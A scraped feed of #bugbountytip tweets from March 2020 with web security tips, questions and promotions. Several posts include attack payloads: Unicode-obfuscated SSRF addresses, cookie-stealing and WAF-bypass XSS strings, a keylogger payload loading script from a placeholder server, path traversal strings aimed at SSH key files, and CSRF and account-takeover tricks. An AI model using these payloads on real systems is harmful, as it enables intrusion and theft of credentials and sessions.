3 SSRF's to bypass WAF http://⑯⑨。②⑤④。⑯⑨｡②⑤④/ http://⓪ⓧⓐ⑨｡⓪ⓧⓕⓔ｡⓪ⓧⓐ⑨｡⓪ⓧⓕⓔ:80/ http://②⑧⑤②⓪③⑨①⑥⑥:80/ http://④②⑤｡⑤①⓪｡④②⑤｡⑤①⓪:80/ http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥ #bugbountytip #bugbountytips #BugBounty #hacking
Ammar Amer🇸🇾
@cry__pto


2020-03-15 21:52:36
3 my own ebook library contain hundreds (661) of hacking books and computer science books,i love reading and reading again and again.feel free to ask me about the best hacking books #Hacking #Pentesting #redteam #bugbountytip #Malware #CyberSecurity https://t.co/lToSzekl5z
The Notorious B.E.E. 🐝
@securibee


2020-03-15 16:55:31
0 "The best time to plant a tree is twenty years ago. The second best time is now." #BugBountyTip #TogetherWeRise #covid19 #lifeprotips
ghostlulz
@ghostlulz1337


2020-03-15 16:43:06
0 Self isolated? Nows a great time to learn how you can make money doing Bug Bounties from home. Get your copy today! https://t.co/zJFRZjg5q2 #bugbountytips #bugbountytip #BugBounty #redteam #caronavirus #redteam #Pentesting #infosec #appsec #xss #dfir #cyber #security https://t.co/uOlw1xqXa6
Hussein Daher
@HusseiN98D


2020-03-15 16:31:05
13 #Bugbountytip : If you do automated tasks on a website and you need to stay logged in, you can use "Tab Auto Refresh" extension on Firefox which will refresh the tab each minute or so. This helps with using tools like SQLmap when session gets expired.
Godsky
@me_godsky


2020-03-15 14:24:43
0 This is really really helpful for noobs, summed it well๐Ÿ‘๐Ÿ‘, going to start bug bounty hunting after completing fortress on HTB. Let's see how much it takes to find my first valid bug :))) #BugBounty #bugbountytips #bugbountytip #hacking #cybersecurity #togetherwehitharder https://t.co/ye1gm2GOIz
refvd_Fvt
@refvdfvt


2020-03-15 14:12:46
0 hackers, what does it mean when it returns : null in smuggling attack based , And thanks in advance ;) @Hacker0x01 @PortSwiggerRes #BugBounty #bugbountytips #bugbountytip https://t.co/uM1MDUzyNI
Arif Khan
@payloadartist


2020-03-15 12:25:17
2 https://t.co/f0fBsHJepH is great if you got an SSRF payload firing months after! #bugbounty #bugbountytip
Ashish Jha
@_ashish_jha


2020-03-15 06:27:59
1 I've got an gitlab Docker login token which is working! What more can I do? #BugBounty #bugbountytip #Pentesting
Eduard Tolosa
@Edu4rdSHL


2020-03-15 06:19:03
4 I just have added Findomain Plus information in top of the Findomain's README. Open the following link to see differences vs free version, how to get it, screenshots and demos. https://t.co/4JhwsMna0p #BugBounty #Subdomains #Monitoring #Hacking #bugbountytip #tools #osint
Shubham Sharma
@Shubham_pen


2020-03-15 02:09:47
8 Many teams consider the use of Web Application Firewalls (WAFs) as a best practice or a compliance requirement when implementing web applications @rajchandel @Medium #cybersecurity #bugbountytip #infosec #linux #aws #firewall #SundayMotivation #ITSecurity https://t.co/34qRlkZiNU
Andri Wahyudi 👾
@andripwn


2020-03-14 20:32:18
0 Object injection on http header. You can use phpgcc for rce https://t.co/b2BTOY2TQx #bugbounty #bugbountytip #bugbountytips https://t.co/JLQoG8Ypio
Hassan Khan
@iamMR_HAK


2020-03-14 19:13:08
1 Hacking for Beginners: File Upload Vulnerability Basic https://t.co/aVIhHxcTaY #BugBounty #bugbountytip #hackerone
Ultra Security
@Ultra__Security


2020-03-14 17:06:43
0 Discovered Cross Site Scripting ( XSS ) Vulnerability in https://t.co/hyzW1ilEXp. For more information about this vulnerability use the link below. https://t.co/ADP6ZW7LyA #XSS #Hack #bugbountytips #bugbountytip #Cross_Site_Scripting https://t.co/xBZYAi5zzC
bb00x
@ihebhamad514


2020-03-14 16:04:06
0 brute force all the gathered param names both (GET/POST) requests (use them in all locations of the webapp) and see every response to identify which of these params are valid. (2/2) #bugbounty #bugbountytips #bugbountytip #bughunting #hackerone
Katie Paxton-Fear
@InsiderPhD


2020-03-14 16:00:00
14 New video 😊 This week we're doing a whirlwind tour of XSS, and covering every type of XSS attack, from stored to self. Answering questions like: What is blind XSS, why is it different? How do you even cause a DOM XSS? #BugBounty #bugbountytip #infosec https://t.co/qsuRO0P62l https://t.co/oDrDzlWgFJ
Aly_Inj3ctor
@AlishahMughal12


2020-03-14 15:52:03
0 Drop endpoints to look for while recon Thanks :) #bugbountytips #bugbountytip #bugbounty
Your Next Bug Tip
@YourNextBugTip


2020-03-14 14:25:30
1 You can bypass mysql_escape_string() using BIG5 encoding. Will not work everytime, encoding misconfig is needed. #bugbountytips #bugbountytip #bugbounty
Your Next Bug Tip
@YourNextBugTip


2020-03-14 14:23:21
1 #bugbountyCOMMUNITY Just Share Any Random One Tip/Trick If you will share, others will share and everyone will learn something new #TogetherWeHitHarder #ItTakesACrowd Can you guys share? @Hacker0x01 @Bugcrowd @Intigriti #YourNextBugTip #bugbounty #bugbountytips #bugbountytip
Hassan Khan
@iamMR_HAK


2020-03-14 11:46:31
0 Master in Wi-Fi ethical Hacking https://t.co/dJUgNR8ad8 #BugBounty #bugbountytip #Hacking
Luigino De Togni
@lewixlabs


2020-03-14 10:23:48
0 ok solved. Both on Android and iOS app, login doesn't work if you digit your credentials just app started. You must open app without account (limited use) and you must go on adult section to fill account form. #bugbountytip
'--+-
@mohsink83789226


2020-03-14 05:33:10
1 you can only allowed to find 3 bug. so what you will find? me 1. IDOR 2. File upload 3. XSS #BugBounty #bugbountytip #BugBountyTales @stokfredrik @thedawgyg @Jhaddix
Your Next Bug Tip
@YourNextBugTip


2020-03-14 04:58:36
1 To bypass old password check You JUST need to change parameter's name from pw -> pw[] 🔥🔥🔥 Gr8 Bypass by Green catz (hoangn144) https://t.co/2qAkONJaEV [If u knw him, plz Tag his twitter account] #bugbountytips #bugbountytip #bugbounty https://t.co/KcMT8upEvS
Sofiane Hamlaoui 🇩🇿
@S0fianeHamlaoui


2020-03-13 21:11:39
4 Follow @CyberSecCare to get all Security/Cyber Security related tweets. A bot that retweets tweets containing the below Twitter tags: #cybersecurity #pentesting #security #infosec #linux #Bugbountytip #bugbountytips #malware #hacking
Ismayil Tahmazov
@Tismayil1


2020-03-13 17:29:39
2 Yes I was awarded with $500 private bug bounty program. Bug Stored XSS. #BugBounty #bugbountytip #bugbountytips #whitehat https://t.co/8C0BjAUqiI
Ammar Amer🇸🇾
@cry__pto


2020-03-13 16:58:10
1 #ProTip don't buy hacking books that hold this title: (**** kalilinux) because it is useless: -1-it's far far away from real world attacks -2-everything is happening in a lab (DVWA) -4-not talking about what's happening behind the scenes or how to evade firewalls #bugbountytip
jineesh
@Jin33sh4k


2020-03-13 16:42:40
1 Came across a interesting finding today, Mass assignment : admin account access #bugbountytip https://t.co/bnByXYiAxN
Ammar Amer🇸🇾
@cry__pto


2020-03-13 16:06:05
10 5 Subdomain Takeover #ProTips.pdf: https://t.co/nzruzjfRPX Finding the Balance Between Speed & Accuracy During an Internet-wide Port Scanning.pdf: https://t.co/HjB6Q1oWOo Phishing With a Rogue Wi-Fi Access Point.pdf https://t.co/n0sgNy37Vc #bugbountytip #Hacking #OSINT #pentest
Grzegorz Niedziela
@gregxsunday


2020-03-13 13:58:21
1 This, ladies and gentlemen, is how a @Hacker0x01 report should be written. https://t.co/sYq1qhUIWC #bugbountytip #bugbountytips
Ultra Security
@Ultra__Security


2020-03-13 10:29:04
0 Discovered Cross Site Scripting ( XSS ) Vulnerability in https://t.co/wSDCfgslz6 . For more information about this vulnerability use the link below. https://t.co/gZGK7CyjaF #XSS #Hack #bugbountytips #bugbountytip #Cross_Site_Scripting https://t.co/8rusM7UXp4
Ultra Security
@Ultra__Security


2020-03-13 09:52:52
0 Discovered Cross Site Scripting (XSS) Vulnerability in https://t.co/kNI3i1RVzb. For more information about this vulnerability use the link below. https://t.co/OmtqHCt8Z0 #XSS #Hack #bugbountytips #bugbountytip #Cross_Site_Scripting https://t.co/ASpLTmhgVO
Shubham Sharma
@Shubham_pen


2020-03-13 03:44:30
4 AWS traffic mirroring is a feature introduced by Amazon Web Services (AWS) on June 25th, 2019. After the release, Mike LoSapio of Palantir identified that it might pose a risk. #infosec #CyberSecurity #BugBountyTip #pentest #AWS #linux #FridayMotivation https://t.co/ol6dq70H4j
Keshav Malik
@g0t_rOoT_


2020-03-12 20:10:40
0 What's the best possible way to exploit a Comment Box in a Web Application !? Any suggestions @stokfredrik ..!? #bugbountytip #Hackers #bugbountytips #Pentesting #webapplication
the-amazing-ferret
@ferret_amazing


2020-03-12 19:29:36
0 Check out my take on #xss attacks in 2020. https://t.co/5vpR3bqAAI #bugbountytips #bugbountytip
Keshav Malik
@g0t_rOoT_


2020-03-12 19:23:27
0 What's the best possible way to exploit a Comment Box in a Web Application !? #bugbountytip #Hackers #bugbountytips #Pentesting #webapplication
Michele Romano
@Mik317_


2020-03-12 19:03:24
8 #bugbountytip The Request.queryString error in .NET avoids you to get XSS? Try the %uff1cscript%uff1ealert(‘XSS’);%uff1c/script%uff1e payload ;)
Julien Ahrens
@MrTuxracer


2020-03-12 17:29:50
20 During my interview with @NahamSec I've shared a very handy #BugBountyTip for wide-scope #BugBounty programs: Look for Google Analytics Tracking IDs (UA-XXXXXX-X) and use i.e. https://t.co/2dTg4vV9it to discover more assets sharing the same ID.
Your Next Bug Tip
@YourNextBugTip


2020-03-12 17:03:59
12 So it is POSSIBLE, You Can Bypass PUT method (CSRF) #bugbountytip POST /url/xyz?_method=PUT B0000M CSRF Bypass Awesome CSRF Bypass by Simgamsetti Manikanta https://t.co/Xt2F0hEDDa [Tag his twitter handle as handle] MUST READ https://t.co/pSql6cqbDy #bugbountytips #bugbounty https://t.co/MHk13MKmZQ
Andri Wahyudi 👾
@andripwn


2020-03-12 16:39:36
0 Thank's you guys for (5,86k subscriber) https://t.co/MbCvnM7jh7 Keep hunt ~ have a nice days #bugbounty #bugbountytip #bugbountytips #poc
'--+-
@mohsink83789226


2020-03-12 11:38:52
2 Found 4 bug rewarded 20 point 🤕👇 #bugbounty #bugbountytips #cybersecurity #bugbountytip https://t.co/aggig1nqBI
Mourad
@SecuAudit


2020-03-12 10:47:34
1 When you choose the easiest programs , Don't expect so much from it #BugBounty #bugbountytips #bugbountytip https://t.co/gDmDaf9Lcd
Your Next Bug Tip
@YourNextBugTip


2020-03-12 07:40:00
4 #bugbountyBEGINNERS If you are creating your own scripts then you can use @Naategh_'s github repo (PyCk) for ideas. This repo contains basic pentest scripts. Specially created for #bugbountyBEGINNERS #bugbounty #bugbountytips #bugbountytip https://t.co/TRNpeuTmw9
the-amazing-ferret
@ferret_amazing


2020-03-12 06:46:39
0 #bugbountytip Try calling the js functions from the developer console. Sometimes developers just hide the buttons if you have no rights to do an action, but forget to check it server sided.
Chevon Phillip
@chevonphillip


2020-03-12 05:07:12
2 I found two SQL Injections tonight in private programs. One blind and the other hanging in plain sight. Here’s a tip. Wayback -> https://t.co/MBp16EYObF -> grep | .php?id= and win #bugbountytip #bugbounty
GokhanGK
@gkhck_


2020-03-12 02:33:50
1 Follow @brutelogic for amazing waf bypass tips. #bugbountytips #bugbountytip #infosec https://t.co/v0OyBJBMF8
Secuna
@SecunaSecurity


2020-03-12 02:03:53
0 Wanna earn more bounties? Then learn more about File Inclusion. On this blog, we demonstrated the differences between Local and Remote File Inclusion. https://t.co/1h76ft3qKB #BugBounty #BugBountyTip #SecurityFirst #Cybersecurity
alert(Y000!)
@_Y000_


2020-03-11 23:17:46
3 Payload HTML-XSS inyection <marquee loop=1 width=0 onfinish=pr\u006fmpt(document.cookie)>Y000</marquee> <marquee loop=1 width=0 onfinish=pr\u006fmpt("xss_by_Y000")>Y000</marquee> #payloads #payload #cybersecurity #infosec #bugbountytip
ｙｏｄｈｈａ
@y0dhha


2020-03-11 22:47:45
3 Path traversal- LFI tools and payloads collection:- https://t.co/MDU73pwpIs https://t.co/3wz6YE7MyZ https://t.co/fabTJqgavZ https://t.co/72mloQcb8i https://t.co/n4b63VqltB https://t.co/UyO45CKpyQ #bugbountytip #bugbounty https://t.co/ppczzATiWu
Kanishk
@kanishkT23


2020-03-11 20:56:03
0 A bug in Avast AntiTrack privacy software allowed MITM attack on HTTPS traffic. https://t.co/dIvt064R8J . #MITM #Cyberattack #Vulnerability #Avast #Security #TLS #Authentication #BrowserHijacking #CyberSecurity #dataprivacy #infosec #bugbountytip #Ethicalhacking @sanjaykatkar
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-03-11 03:45:17
2 NULLCON Puzzle #nullcon2020 👇👇👇👇👇👇 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/3tpyvn5N16
Bhavesh Thakur
@Bhavesh_Thakur_


2020-03-10 19:04:49
0 Sometimes blacklisting is really helpful than white listing. Application was expecting an external URL as input. Provided 127.0.0.1 & got default webserver page in response. Sent request 127.0.0.1:0-65535 server went down after 120 requests. #DOS #critical #bugbountytip
Ameen
@ameenmaali


2020-03-10 18:06:53
8 Little known or talked about fact: EC2 instances on AWS are preconfigured with an /etc/hosts record to point the hostname “instance-data” to the metadata service. Would look like: http://instance-data/latest/meta-data/. Likely missed in SSRF blacklists. #bugbounty #bugbountytip
Unde5able
@Unde5able


2020-03-10 16:29:58
3 #RECON SERIES TO FIND SUBDOMAIN: *. https://t.co/1v5l4p2xOW CHECK FOR SCOPE IN TARGET #MORE ATTACK SURFACE. #bugbounty #bugbountytip #infosec #cybersecurity #web #pentesting #unde5able #hacker https://t.co/LnAYHw6bob
Ammar Amer🇸🇾
@cry__pto


2020-03-10 15:28:02
1 if you been wondering what is the best book to learn how to collect info about your targets, whether it is a company, person, website, i will recommend this book, very close to real world attacks + discusses a lot of needed tools. your full guide for #osint #bugbountytip by @vinnytroia https://t.co/ktDgDXwxnj
Shubham Sharma
@Shubham_pen


2020-03-10 15:21:59
1 Spoof SSDP replies and creates fake UPnP devices to phish for credentials and NetNTLM challenge/response. @rajchandel #cybersecurity #bugbountytip #infosec #pentest #ntml #redteam #blueteam #TuesdayMotivation #WednesdayMotivation https://t.co/gKkLkJj6xw
SecHaq
@SecHaq


2020-03-10 14:48:40
2 Does anyone know how to exploit a device token for firebase fcm or access token for salesfoce extract target api.. Can't find any good documentation regarding them #bugbounty #bugbountytip #hackerone #bugcrowd #hacking #hacker
Ashkan
@11xuxx


2020-03-10 11:59:19
0 Bypass CSRF Protection 1. every POST/PUT/PATCH request was protected by X-CSRF-TOKEN in header 2. changed from POST to GET and appended request body to url as request param 3. removed X-CSRF-TOKEN from headers 4. received 200 thus bypassed CSRF protection #bugbountytip
Shahmeer Amir
@Shahmeer_Amir


2020-03-10 07:02:00
0 The most comprehensive sub domain scanner. #bugbountytip #BugBountyTales
Security Executions Code
@pwn0sec


2020-03-09 21:41:18
1 Directory listing bypass payloads : Any file name or folder name ..%3B/ /%20../ /.ssh/authorized_keys /.ssh/known_hosts /%2e%2e/google.com ..%3B///////////////////////////////// Owned by : @Dhamu_offi #bugbountytip #bugbountytips #bypass https://t.co/ilYvwZJZnH
Shubham Sharma
@Shubham_pen


2020-03-09 17:37:32
2 Hi Friends, today we will walk through various HTTP Protocol methods and the tools used to extract those available HTTP methods in a web server. @rajchandel #infosec #cybersecurity #bugbountytip #Https #pentest #linux #MondayMotivaton #TuesdayThoughts https://t.co/kvvxRGpJbR
Michele Romano
@Mik317_


2020-03-09 17:32:42
1 Trying to figure out how works a regex? Go on https://t.co/2NKrl1LVJt ;) #bugbountytip https://t.co/aNvULoZ1qM
sw33tLie
@sw33tLie


2020-03-09 16:05:38
0 Now you only have to add them to your httprobe command with -p http(s):port_number. This method is much better than just adding random ports hoping to find something... (2/2) #bugbountytip #BugBounty
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-03-09 15:46:57
0 Cross Site Scripting Basics - #XSS https://t.co/pGFIGWCsM7 Follow Us 💰💰 https://t.co/7vInhGt6uv … Subscribe to Youtube Channel for Free Tutorials https://t.co/WEmewhqP8R … #BugBounty #BugBountyTip #bugbountytips #penetr
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-03-09 12:49:41
3 Apache OFBiz has an #unauthenticated reflected #XSS, named CVE-2020-1943. PoC: http(s)://target.com/catalog/control/stream?contentId=<img/src/onerror=alert("XSS")> The path /catalog/ can also be replaced by /content/ or /partymgr/. #bugbounty #bugbountytip #infosec
Sudoka
@sudo_sudoka


2020-03-09 12:21:44
1 Apache OFBiz has an #unauthenticated reflected #XSS, named CVE-2020-1943. PoC: http(s)://target.com/catalog/control/stream?contentId=<img/src/onerror=alert("XSS")> The path /catalog/ can also be replaced by /content/ or /partymgr/. #bugbounty #bugbountytip #infosec
Your Next Bug Tip
@YourNextBugTip


2020-03-09 12:20:21
4 For #bugbountyBEGINNERS Bug are out there, Just Keep Digging... $$$$ by using shodan Hunt by @fatratfatrat (Vijaysimha Reddy Bathini) BTW waiting for "Tale of Account Takeovers (Part-2)" @fatratfatrat #bugbountytips #bugbountytip #bugbounty https://t.co/40L3uHAB0r
Alfon SeguridadRedes
@seguridadyredes


2020-03-09 08:06:42
1 #bugbountytip #bugbounty Directory listing bypass payloads https://t.co/wR6m4OMfVY
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 台風
@spyerror


2020-03-09 05:52:58
3 ✯ Cloudfront ▹ $XSS bypass detection, point shot. $xssone ▸ ">'><details/open/ontoggle=confirm('XSS')> ❌ $xsstwo ▸ 6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/ ❌ $xssthr ▸ "><img src=x onerror=confirm(1);> ❌ #BugBounty #BugBountyTip #WAF #infosec
jdksec
@jdksec


2020-03-09 05:48:16
2 Nmap oneliner to give you a clean list of host:port:version: #> mkdir nmap; cat targets.txt | parallel -j 35 nmap {} -sTVC -host-timeout 15m -oN nmap/{} -p 22,80,443,8080 --open > /dev/null 2>&1; cd nmap; grep -Hari "/tcp" | tee -a ../services.txt; cd ../ #bugbountytip #BugBounty https://t.co/PpRhQvTcUF
Shady
@Shady07090477


2020-03-09 04:26:44
0 Hello guys new to #hacking and learning XSS now i've solved two to three labs and i've that cheat sheet from GitHub is there any tip or write up which are different if there is please comment it would help me! Thanx #bugbountytips #bugbountytip #bugbounty
Shubham Sharma
@Shubham_pen


2020-03-09 04:01:51
4 In this article, we are going to describe the utility of the BITSAdmin tool and how vital it is in Windows Penetration Testing. @rajchandel @windowsdev #cybersecurity #bugbountytip #infosec #pentest #bitsadmin #ITSecurity #MondayMotivaton https://t.co/b3pV7RSzTu
AkaaZaan
@AkaaZaan


2020-03-09 03:20:18
0 Need some more ideas to try at Arbitrary file upload vulnerability? #bugbountytip
Daher Mohamed
@DaherMohamed4


2020-03-08 23:31:41
3 5 min P1 #BugBounty #BugBountyTips #BugBountyTip https://t.co/yxEew8bviU
LISSANON Cédric
@LissanonCedric


2020-03-08 20:29:10
0 I learned : try to stop #redirection on role page (#admin page) #sqli #bugbountytip https://t.co/cNNBBn8Ger
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 台風
@spyerror


2020-03-08 13:36:20
3 « HTML "💵" text, `XSS´ payload. » ✮ <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">@spyerror</button> ✮ #BugBounty #BugBountyTip #WAF #infosec
Michele Romano
@Mik317_


2020-03-08 10:05:57
1 #bugbountytip Searching for CVEs?? Use https://t.co/QIkKy2FiKs , Git and ... Gist. You'll find every thing you need ;)
Your Next Bug Tip
@YourNextBugTip


2020-03-08 07:46:46
2 #bugbountyHUNTERS Do you know that an infinite redirect loop cost $100?😲 @D0rkerDevil (Ashish Kunwar) ^He knows Read Here (2 min read) https://t.co/3xgWOMYEEu #bugbountytips #bugbountytip #bugbounty
Dhamu
@Dhamu_offi


2020-03-08 06:31:42
4 #bugbountytip #bugbounty Directory listing bypass payloads : Any file name or folder name ..%3B/ /%20../ /.ssh/authorized_keys /.ssh/known_hosts /%2e%2e/google.com ..%3B///////////////////////////////// https://t.co/QhSkSflb1k
Dhamu
@Dhamu_offi


2020-03-08 06:11:59
0 #bugbountytip #bugbounty Pulse Secure VPN Exploitation #nullcon2020 #Owaspseasides [SLIDES] https://t.co/nX7GOLcC9m https://t.co/PxeWP6hz1w
Ammar Amer🇸🇾
@cry__pto


2020-03-08 06:01:58
2 OPEN REDIRECT: simply changing the ta_redirect parameter to an external site would redirect the user to an external site controlled by the attacker: https://t.co/1J9SnT5Uvx SHOPIFY OPEN REDIRECT: #bugbounty:report👇 https://t.co/1Vhl7NzBw7 #bugbountytip #Hacking #pentest
Unde5able
@Unde5able


2020-03-08 04:38:09
0 🤡PRACTICE HACK ON LABS ENVIRONMENT .🤡 Follow me @Unde5able on insta & twitter #bugbountytip #bugbounty #bughunter #infosec #bugbountytips #hacking2020 #unde5able https://t.co/dZxW6fT38t
Unde5able
@Unde5able


2020-03-08 04:34:30
0 WHERE TO HUNTS BUGS? -BUG BOUNTY PLATFORMS:there are so many,some are listed below Follow me @Unde5able on insta & twitter #bugbountytip #bugbounty #HackerOne #bugcrowd #hacking #hacking2020 https://t.co/3lgpOsijoq
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-03-08 03:29:40
1 Remote XSS Keylogger: Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)> This will log a user's input to your remote server. #BugBounty #BugBountyTip #XSS https://t.co/Hd3CFrclqD
Your Next Bug Tip
@YourNextBugTip


2020-03-07 17:17:38
8 Admin Acc Takeover using `ı` instead of `i` POC ---- Create Acc [email protected]ın on https://t.co/3rxqp3ajJl Reset Pwd LInk & change pwd Boom, [email protected] [Real Admin]'s pwd changed BADASS Bypass by @ShauryaSharma05 #bugbountytips #bugbountytip #bugbounty https://t.co/cbBW7AOJLU
an0malous
@an0malous_


2020-03-07 15:43:27
0 I wanted to see if I could get some opinions on whether people prefer VPN or a VPS for doing reconnaissance for bug bounties. Is there a benefit to one vs the other? #bugbounty #bugbountytip #bugbountytips
Zarcolio
@zarcolio


2020-03-07 09:34:30
2 Web applications hacker's Handbook Extras https://t.co/is6alAQJiF #bugbountytip
ʕ•̫͡•ʕ•̫͡•ʔun4giʕ•̫͡•ʔ•̫͡•ʔ
@un4gii


2020-03-07 06:18:51
0 Google dork for /_layouts/15/ -> likely candidate for CVE-2019-0604 -> get that RCE #bugbountytip
(((Gamliel)))
@Gamliel_InfoSec


2020-03-06 23:50:40
0 #ATO #InsufficientSessionExpiration #PrivEsc #BugBountyTip Try to elevate privileges or account takeover... While logged-in with an Admin user, open new tab and begin the process to create another administrator, in the first tab do a log-off... 1/n
Rafin Rahman Chy
@rafinrahmanchy


2020-03-06 20:19:57
4 Wow! OTP bypass with parameter tampering! https://t.co/tC4wpVCL69 #BugBounty #bugbountytip #bugbountytips #WebSecurity #websec #AppSec #netsec #pentest #Pentesting #Exploit #EthicalHacking #Hacking #Hacker #Hackers #Vulnerability #CyberSecurity #InfoSec #infosecurity #ITSecurity
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-03-06 17:16:16
2 #hackdoor stickers and #swag coming to #nullcon ! Follow Us To Get the Swag ! 👇👇 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #devops #devsecops https://t.co/7UQx8EVA80
R M
@kingthorin_rm


2020-03-06 16:52:46
1 Have XSS and need a redirect? Try: alert(window.location='https://t.co/7NZHkvqxIJ'); Together we hit harder. #BugBountyTip
Kyle
@B3nac


2020-03-06 16:20:01
1 @Alyhamza_fit @Bugcrowd Good luck and have fun 🙂 Look for deeplinks that don't have android:autoVerify="true" specified in the manifest. These take the user directly to the resource without a prompt. #bugbountytip
Adam Langley
@adamtlangley


2020-03-06 15:10:23
2 If you're interested in practising your #bugbounty webapp #hacking skills on realistic CTF's including recon, CSRF, subdomain takeover, injection and much more give https://t.co/13ucD5B0eb a try #bugbountytip
thehackerish
@thehackerish


2020-03-06 14:27:13
0 An app is as secure as its weakest component ⛓️. Learn how to attack and mitigate it. Many #bugbountytip along the way 👇👇👇 https://t.co/8Zq21nfM9f
Hussein Daher
@HusseiN98D


2020-03-06 10:56:33
1 If you're searching for a specific tool for #bugbounty, write what the tool must do and if the tool already exists someone will comment out the name. #pentest #bugbountytip #bugbountytips
Adnan Malik
@infoadnanmalik


2020-03-06 09:09:19
1 There is no rate limit to 'Verification of Number' on target. But cloudfront is restricting the IP after some hundreds of request which is reducing the attack surface! Anyway to play with it? @_jensec @HusseiN98D #bugbountytips #infosec #bugbountytip
Security Executions Code
@pwn0sec


2020-03-05 16:39:23
0 Wordpress: Multiple Vulnerabilities in Simple Login Log Plugin https://t.co/PswYgAhPRs #SQL_Injection #wordpress #bugbountytips #bugbountytip #penetrationtesting https://t.co/WVzpDvTAms
Security Executions Code
@pwn0sec


2020-03-05 16:30:39
4 Pwned @andripwn - Bypassing WAF XSS with language /></noscript></form><script language="javascript">window.alert(1)('document.forms[0].submit()', 0);</script></body></html> #xss #bypasswaf #bugbountytips #bugbountytip #penetrationtesting https://t.co/3fJmM9uTLO
Naategh
@Naategh_


2020-03-05 16:08:21
0 That's what I wanted really to simply hunt IDORs! Firefox Containers! https://t.co/jlTKM9DbuL #bugbounty #bugbountytip
Kanika
@kanika_enc


2020-03-05 13:59:53
1 Brute forcing an iOS app using frida script for finding the correct pin Cool things that happened in iOS app hacking training by @enciphers_ #MobileSecurity #iOS #cybersecurity #infosec #CyberSec #appsec #bugbounty #pentest #Pentesting #ethicalhacking #cyber #bugbountytip https://t.co/L3XNnT7WUy
Israel Thomas
@IsraelThomas_7


2020-03-05 12:40:19
0 #bugbountytip I love Data scientists and ML engineers. You'll know what I mean 😋
Your Next Bug Tip
@YourNextBugTip


2020-03-05 08:42:38
0 While entering a highly secure building... [-GUARD-] ENTER THE PIN [-John-Wick-] Killed the GUARD (John Entered The Building) Building - An App Guard - A file John Wick - @kernel_rider Read Here https://t.co/vZIJNgGGSV #bugbountytips #bugbountytip #bugbounty
Rohit Soni
@rohit_ka_tweet


2020-03-05 08:15:42
0 Intercept HTTPS traffic of App 1. Decompile 2. Replace 'https' with 'http' in all smali files find . -type f -exec sed -i 's/https\:\/\//http\:\/\//g' {} + 3. Build 4. Redirect req. to 443 Proxy-Options-Edit-Request Handling Ref: @Hacker0x01 Interview of @_bagipro #bugbountytip
Shubham Sharma
@Shubham_pen


2020-03-05 03:47:23
3 When we say “ping,” we often are just limiting its definition to checking whether a host is alive or not. @rajchandel #forensics #infosec #pentest #cybersecurity #linux #BugBountyTip #ping #ITSecurity #ThursdayMotivation #Investigacion https://t.co/oXcj7zCYPW
AkaaZaan
@AkaaZaan


2020-03-05 02:56:02
0 BugBounty Hunters How do you exploit .net deserialization without ysoserial tool? I need help? #bugbountytip
'--+-
@mohsink83789226


2020-03-04 20:51:43
1 Just find an API key leaking bug. API key store in variable (JS) file. What can I do with it. After reading J's file I notice website using API key variable 6 time. I don't have any idea. Anyone can help ?? #BugBounty @thedawgyg #BugBountyTip
Security Executions Code
@pwn0sec


2020-03-04 18:22:02
1 This made me laugh, but it’s so true. Face with tears of joy - #redteam #bugbountytips #bugbountytip #penetrationtesting https://t.co/wLqIyPiPFH
Your Next Bug Tip
@YourNextBugTip


2020-03-04 17:31:45
6 How to make 20000$ when target have more than 1K report #bugbountytip Think out of the box A full detailed Writeup on how to approach your target from scratch and finding multiple vulnerabilities Awesome Article by @YoKoAcc #bugbountytips #bugbounty https://t.co/bpvJcP45YI
Sofiane Hamlaoui 🇩🇿
@S0fianeHamlaoui


2020-03-04 16:58:00
1 Jailbreak iPhone with a rooted Android with (checkra1n) #cybersecurity #pentesting #security #infosec #linux #Bugbountytip #bugbountytips #malware #hacking https://t.co/ajw4RKk8N4
CyberSecurityBot 🤖
@CyberSecCare


2020-03-04 16:57:50
1 Jailbreak iPhone with a rooted Android with (checkra1n) #cybersecurity #pentesting #security #infosec #linux #Bugbountytip #bugbountytips #malware #hacking https://t.co/7UwKd8eMl4
AkaaZaan
@AkaaZaan


2020-03-04 16:18:20
0 How to use ysoserial on linux? Does it work on linux? #bugbountytip #bugbountytip
Kato Zum
@ZumKato


2020-03-04 16:18:09
0 Yay, I was awarded a $250 bounty on @Hacker0x01 ! https://t.co/JYuR4H8c2H #TogetherWeHitHarder #bugbountytips #bugbountytip
wwjy1f
@ddhkttmm


2020-03-04 16:04:11
0 Always convert parameter to array you will get unexpected result, sometimes xss bypass Like, path=/abc to path["]=/abc #bugbountytip
'--+-
@mohsink83789226


2020-03-04 16:00:59
0 Website?path=text Response { "assertPaths":["text"],"metadata":{} } What to do๐Ÿค• @zseano @NahamSec #bugbountytip
Abhinav Gyawali
@SlikeGyawali


2020-03-04 14:43:07
1 Just found this gold mine! Got loads of amazing books useful of infosec! https://t.co/P6Z4VapVAY #infosec #bugbounty #bugbountytip
Hussein Daher
@HusseiN98D


2020-03-04 12:42:00
10 Time for a #BugBountyTip Download old version of mobile apps and search for secrets. Most of the time, when an APP is updated, devs might remove secrets and forget revoking them. Search for API tokens, AWS credentials, ... #bugbounty #bugbountytips #pentest #infosec
Nick || hunt4p1zza
@ngkogkos


2020-03-04 12:20:19
2 It's also always a good idea to keep an eye on Logger++/Flow for the requests Active Scanner (AS) produces (or other scanning plugins), sometimes you may see a 500 error which AS failed to exploit, but you may be able to get something out of it! #BugBounty #bugbountytip https://t.co/wMyrxZp2fp
Shubham Sharma
@Shubham_pen


